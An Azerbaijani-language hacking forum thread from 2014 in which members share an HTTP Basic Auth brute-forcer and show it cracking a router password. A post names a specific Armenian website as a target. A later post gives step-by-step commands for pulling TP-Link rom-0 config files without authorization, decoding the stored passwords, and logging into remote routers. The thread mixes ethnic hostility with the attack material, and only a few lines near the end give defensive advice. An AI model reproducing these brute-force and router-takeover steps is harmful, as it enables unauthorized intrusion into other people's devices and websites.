Anti-armenia.ORG - Forumlar - Basic Auth Bruteforcer



Istifadəçi
    2014-04-19 19:09 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Yazdığım HTTP Basic Authentication Bruteforcer.
Məqsədi:

Modem/Routerlərdə/Saytlarda istifadə edilən basic Auth -a qarşı bruteforce etməkdir.

http://packetstorm.interhost.co.il/Crackers/basicauth-brute.txt
http://packetstormsecurity.com/files/125752/Basic-Authentication-Bruteforcer.html


Məsələn modemə qarşı:

Kod:
[blackhat@localhost Downloads]$ php -f modembrute.php

############################################################
**************** HTTP BASIC AUTH BRUTEFORCER **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://192.168.1.1/
********************* Coded By AkaStep ********************
***********************************************************

[blackhat@localhost Downloads]$ php -f modembrute.php admin /home/blackhat/Downloads/cpass http://192.168.1.1
############################################################
**************** HTTP BASIC AUTH BRUTEFORCER **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://192.168.1.1/
********************* Coded By AkaStep ********************
***********************************************************
HTTP STATUS CODE: 401 [1] YOXLANILIR => admin  PAROL QISMINDE ISE:
HTTP STATUS CODE: 401 [2] YOXLANILIR => admin  PAROL QISMINDE ISE: !@#$%
HTTP STATUS CODE: 401 [3] YOXLANILIR => admin  PAROL QISMINDE ISE: !@#$%^
HTTP STATUS CODE: 401 [4] YOXLANILIR => admin  PAROL QISMINDE ISE: !@#$%^&
HTTP STATUS CODE: 401 [5] YOXLANILIR => admin  PAROL QISMINDE ISE: !@#$%^&*
HTTP STATUS CODE: 401 [6] YOXLANILIR => admin  PAROL QISMINDE ISE: @#$%^&
HTTP STATUS CODE: 401 [7] YOXLANILIR => admin  PAROL QISMINDE ISE: *
HTTP STATUS CODE: 401 [8] YOXLANILIR => admin  PAROL QISMINDE ISE: ggevorr@freenet.am
HTTP STATUS CODE: 401 [9] YOXLANILIR => admin  PAROL QISMINDE ISE:
HTTP STATUS CODE: 401 [10] YOXLANILIR => admin  PAROL QISMINDE ISE: 0000
HTTP STATUS CODE: 401 [11] YOXLANILIR => admin  PAROL QISMINDE ISE: 00000
HTTP STATUS CODE: 401 [12] YOXLANILIR => admin  PAROL QISMINDE ISE: 3v1lc0d34@gmail.com
HTTP STATUS CODE: 401 [13] YOXLANILIR => admin  PAROL QISMINDE ISE: 000000
HTTP STATUS CODE: 401 [14] YOXLANILIR => admin  PAROL QISMINDE ISE: 0000000
HTTP STATUS CODE: 401 [15] YOXLANILIR => admin  PAROL QISMINDE ISE: 00000000
HTTP STATUS CODE: 401 [16] YOXLANILIR => admin  PAROL QISMINDE ISE: 000000000
HTTP STATUS CODE: 401 [17] YOXLANILIR => admin  PAROL QISMINDE ISE: 0000000000
HTTP STATUS CODE: 401 [18] YOXLANILIR => admin  PAROL QISMINDE ISE: 000000000000000
HTTP STATUS CODE: 401 [19] YOXLANILIR => admin  PAROL QISMINDE ISE: 0000007
HTTP STATUS CODE: 401 [20] YOXLANILIR => admin  PAROL QISMINDE ISE: 000001
HTTP STATUS CODE: 401 [21] YOXLANILIR => admin  PAROL QISMINDE ISE: 000006
HTTP STATUS CODE: 401 [22] YOXLANILIR => admin  PAROL QISMINDE ISE: 000007
HTTP STATUS CODE: 401 [23] YOXLANILIR => admin  PAROL QISMINDE ISE: 00001
HTTP STATUS CODE: 401 [24] YOXLANILIR => admin  PAROL QISMINDE ISE: 000111
HTTP STATUS CODE: 401 [25] YOXLANILIR => admin  PAROL QISMINDE ISE: 000123
HTTP STATUS CODE: 401 [26] YOXLANILIR => admin  PAROL QISMINDE ISE: 000666
HTTP STATUS CODE: 401 [27] YOXLANILIR => admin  PAROL QISMINDE ISE: 0007
HTTP STATUS CODE: 401 [28] YOXLANILIR => admin  PAROL QISMINDE ISE: 000999
HTTP STATUS CODE: 401 [29] YOXLANILIR => admin  PAROL QISMINDE ISE: 000seven
HTTP STATUS CODE: 401 [30] YOXLANILIR => admin  PAROL QISMINDE ISE: pentest0
HTTP STATUS CODE: 401 [31] YOXLANILIR => admin  PAROL QISMINDE ISE: 001001
HTTP STATUS CODE: 401 [32] YOXLANILIR => admin  PAROL QISMINDE ISE: 001122
HTTP STATUS CODE: 401 [33] YOXLANILIR => admin  PAROL QISMINDE ISE: pentest
HTTP STATUS CODE: 401 [34] YOXLANILIR => admin  PAROL QISMINDE ISE: pentest00
HTTP STATUS CODE: 401 [35] YOXLANILIR => admin  PAROL QISMINDE ISE: 00112233
HTTP STATUS CODE: 401 [36] YOXLANILIR => admin  PAROL QISMINDE ISE: 001234
HTTP STATUS CODE: 401 [37] YOXLANILIR => admin  PAROL QISMINDE ISE: 0015
HTTP STATUS CODE: 401 [38] YOXLANILIR => admin  PAROL QISMINDE ISE: 002749
HTTP STATUS CODE: 401 [39] YOXLANILIR => admin  PAROL QISMINDE ISE: 002811
HTTP STATUS CODE: 401 [40] YOXLANILIR => admin  PAROL QISMINDE ISE: 003487
HTTP STATUS CODE: 401 [41] YOXLANILIR => admin  PAROL QISMINDE ISE: 007
HTTP STATUS CODE: 401 [42] YOXLANILIR => admin  PAROL QISMINDE ISE: 007007
HTTP STATUS CODE: 401 [43] YOXLANILIR => admin  PAROL QISMINDE ISE: 009988
HTTP STATUS CODE: 401 [44] YOXLANILIR => admin  PAROL QISMINDE ISE: 010101
HTTP STATUS CODE: 401 [45] YOXLANILIR => admin  PAROL QISMINDE ISE: 010105
HTTP STATUS CODE: 401 [46] YOXLANILIR => admin  PAROL QISMINDE ISE: 010106
HTTP STATUS CODE: 401 [47] YOXLANILIR => admin  PAROL QISMINDE ISE: 010107
HTTP STATUS CODE: 401 [48] YOXLANILIR => admin  PAROL QISMINDE ISE: 010108
HTTP STATUS CODE: 401 [49] YOXLANILIR => admin  PAROL QISMINDE ISE: 010187
HTTP STATUS CODE: 401 [50] YOXLANILIR => admin  PAROL QISMINDE ISE: 010188
HTTP STATUS CODE: 401 [51] YOXLANILIR => admin  PAROL QISMINDE ISE: 010189
HTTP STATUS CODE: 401 [52] YOXLANILIR => admin  PAROL QISMINDE ISE: 010190
HTTP STATUS CODE: 401 [53] YOXLANILIR => admin  PAROL QISMINDE ISE: 010191
HTTP STATUS CODE: 401 [54] YOXLANILIR => admin  PAROL QISMINDE ISE: 010203
HTTP STATUS CODE: 401 [55] YOXLANILIR => admin  PAROL QISMINDE ISE: 01020304
HTTP STATUS CODE: 401 [56] YOXLANILIR => admin  PAROL QISMINDE ISE: 0102030405
HTTP STATUS CODE: 401 [57] YOXLANILIR => admin  PAROL QISMINDE ISE: 010203040506
HTTP STATUS CODE: 401 [58] YOXLANILIR => admin  PAROL QISMINDE ISE: 010288
HTTP STATUS CODE: 401 [59] YOXLANILIR => admin  PAROL QISMINDE ISE: 010289
HTTP STATUS CODE: 401 [60] YOXLANILIR => admin  PAROL QISMINDE ISE: 010290
HTTP STATUS CODE: 401 [61] YOXLANILIR => admin  PAROL QISMINDE ISE: 010388
HTTP STATUS CODE: 401 [62] YOXLANILIR => admin  PAROL QISMINDE ISE: 010389
HTTP STATUS CODE: 401 [63] YOXLANILIR => admin  PAROL QISMINDE ISE: 010390
HTTP STATUS CODE: 401 [64] YOXLANILIR => admin  PAROL QISMINDE ISE: 010391
HTTP STATUS CODE: 401 [65] YOXLANILIR => admin  PAROL QISMINDE ISE: 010407
HTTP STATUS CODE: 401 [66] YOXLANILIR => admin  PAROL QISMINDE ISE: 010488
HTTP STATUS CODE: 401 [67] YOXLANILIR => admin  PAROL QISMINDE ISE: 010489
HTTP STATUS CODE: 401 [68] YOXLANILIR => admin  PAROL QISMINDE ISE: 010490
HTTP STATUS CODE: 401 [69] YOXLANILIR => admin  PAROL QISMINDE ISE: 010493
HTTP STATUS CODE: 401 [70] YOXLANILIR => admin  PAROL QISMINDE ISE: 010588
HTTP STATUS CODE: 401 [71] YOXLANILIR => admin  PAROL QISMINDE ISE: 010589
HTTP STATUS CODE: 401 [72] YOXLANILIR => admin  PAROL QISMINDE ISE: 010590
HTTP STATUS CODE: 401 [73] YOXLANILIR => admin  PAROL QISMINDE ISE: 010591
HTTP STATUS CODE: 401 [74] YOXLANILIR => admin  PAROL QISMINDE ISE: 010592
HTTP STATUS CODE: 401 [75] YOXLANILIR => admin  PAROL QISMINDE ISE: 010686
HTTP STATUS CODE: 401 [76] YOXLANILIR => admin  PAROL QISMINDE ISE: 004555
HTTP STATUS CODE: 401 [108] YOXLANILIR => admin  PAROL QISMINDE ISE: 0123456789
HTTP STATUS CODE: 401 [109] YOXLANILIR => admin  PAROL QISMINDE ISE: 01234567890
HTTP STATUS CODE: 401 [110] YOXLANILIR => admin  PAROL QISMINDE ISE: 013579
HTTP STATUS CODE: 401 [111] YOXLANILIR => admin  PAROL QISMINDE ISE: 0147258369
HTTP STATUS CODE: 401 [112] YOXLANILIR => admin  PAROL QISMINDE ISE: 0147852
HTTP STATUS CODE: 401 [113] YOXLANILIR => admin  PAROL QISMINDE ISE: 01478520
HTTP STATUS CODE: 401 [114] YOXLANILIR => admin  PAROL QISMINDE ISE: 0147852369
HTTP STATUS CODE: 401 [115] YOXLANILIR => admin  PAROL QISMINDE ISE: 014789
HTTP STATUS CODE: 200 [116] OWNED! admin PASSWD: *********************

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2014-04-19 19:28 GMT                 

AMISAI HACKER



VIP
Mesaj Sayı : 138
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Ant!arm3n!ATeaM
Ölkə :
Məslək : İOS cheater and Defacer
Yaş :
Mesaj :

Mövzunu Paylaş!


Çox sağol.

IOS cheater and Defacer.
Azerba!jaN&Turk3Y
Anti-armenia.ORG
    

Istifadəçi
    2014-04-19 19:45 GMT                 

Dervish57



İstifadəçi
Mesaj Sayı : 48
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Dervish57
Yaş : 28
Mesaj :

Mövzunu Paylaş!


əziyətinçün çox sağol amma anlamadım daha ətraflı yazsan sevinərdim

Həyatınin Bir Dəqiqəsini Boşa Xercləməyə Cürət Edən Biri
Həyatinin Dəyərini Alnalmışdır

Charles Darwin
Anti-armenia.ORG
    

Istifadəçi
    2014-04-19 19:57 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Siz sağolun.
@Dervish57
Loru dildə desək bax hal-hazırda misal üçün bu erməni saytında istifadə edilən Authorization növünə qarşı bruteforce etmək üçündür.

http://razm.info/

HTTP Headerlərə belə baxdıqda o dəqiqə görsənirki:

Basic realm="Password Protected Area"


Bu metod eynilə əksər modem və routerlərdə də istifadə edilir.

Ümumiyyətlə isə bu Authorization mexanizm barəsində

http://en.wikipedia.org/wiki/Basic_access_authentication

buradan oxuya bilərsiniz.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2014-05-17 20:17 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


@@BlackMinD

Bunu nə formatında save edim ?

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-05-18 08:32 GMT                 

b@t0n23



Gold
Mesaj Sayı : 159
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


php formatda save edirik. sonra

#curl -İ http/192.168.1.1/

və ya FİREFOX-da Live HTTP Header-lə

əgər HTTP headerde WWW-Authenticate: Basic realm="Password Protected Area"

HTTP/1.1 401 Authorization Required
Server: Apache/2.2.22 (Ubuntu)
WWW-Authenticate: Basic realm="Password Protected Area"
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1

Belə bir şey əks olunursa, onda bu script işləyəcək. onda yenidən STEP göstardiyi kimi

#php -f script.php admin /pass_faylı/olan_yer/pass.txt http/192.168.1.1

Burda vacib amillərdən biri brut olan sayt və ya link WWW-Authenticate: Basic realm="Password Protected Area" dəstəkləməlidir.

Bu qədər. Uğurlar.

Aka Stepə Təşəkkür!

Anti-armenia.ORG
    

Istifadəçi
    2014-05-18 10:48 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Belə bir kritiki metod da var)
Əksər routerlərdə (xüsusilə partd*ğ TP-linklərdə) işləkdir.


1-ci kritiki boşluq TP-linklərdə rom-0 -ı unautorized şəkildə download etməl olur.
2-ci bu download etdiyiniz rom-0 -da parollar saxlanılır!


http://piotrbania.com/all/utils/RomDecoder.c

Yükləyirik və Linuxda kompilə edirik:

Kod:
[blackhat@localhost ~]$ cd ~/Downloads/
[blackhat@localhost Downloads]$ gcc RomDecoder.c -o fuck
[blackhat@localhost Downloads]$ chmod u+x fuck
[blackhat@localhost Downloads]$ ./fuck
--------------------------------------------
zynos rom-0 config password retriever
http://piotrbania.com - @piotrbania
--------------------------------------------

Usage: rom0decoder <path_to_rom0_file>



Hədəfin rom-0 ını download edirik:

http://REMOIP/rom-0

yaxud Lokal şəbəkədədirsə:

http://LOCAL_IP/rom-0




işə başlayırıq.


Kod:
[blackhat@localhost Downloads]$ ./fuck rom-0\(1\)
--------------------------------------------
zynos rom-0 config password retriever
http://piotrbania.com - @piotrbania
--------------------------------------------

Trying to retrieve password from "rom-0(1)"
[00] rom_header block offset=0x00001ffc size=0x00000003 name=boot
Not the one we wanted, skipping.
[01] rom_header block offset=0x00000148 size=0x0000000c name=spt.dat
Not the one we wanted, skipping.
[02] rom_header block offset=0x00000168 size=0x00001643 name=autoexec.net
End of stream
Your password is: PAROLBURADA
End of file reached.
Dumped 2048 bytes to "rom-0(1).dat"
All done!



Your password is: PAROLBURADA


-da artıq paroldur.


Login oluruq REMOTE modemə və məqsədəuyğun istifadə edirik.


Gördüyünüz kimi zir-zibil routerlər xüsusilə TP-linklər konkret başbəlasıdırlar.


TP-linklər modeminizə firmware update varsa update edin.
Yoxdursa zibil yeşiyinə layiqdir TP-link getməyə.

Digər müəyyən qarşısını almaq metodu (temporal) şəbəkəni firewall səviyyədə secure etməkdir ki sizdən başqa heç kimi access almasın routerin interfeysinə.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2014-06-04 14:29 GMT                 

C4pt41n Pr0xy



VIP
Mesaj Sayı : 1448
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Şuşa
Ölkə :
Məslək : Student
Yaş : 21
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər...

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG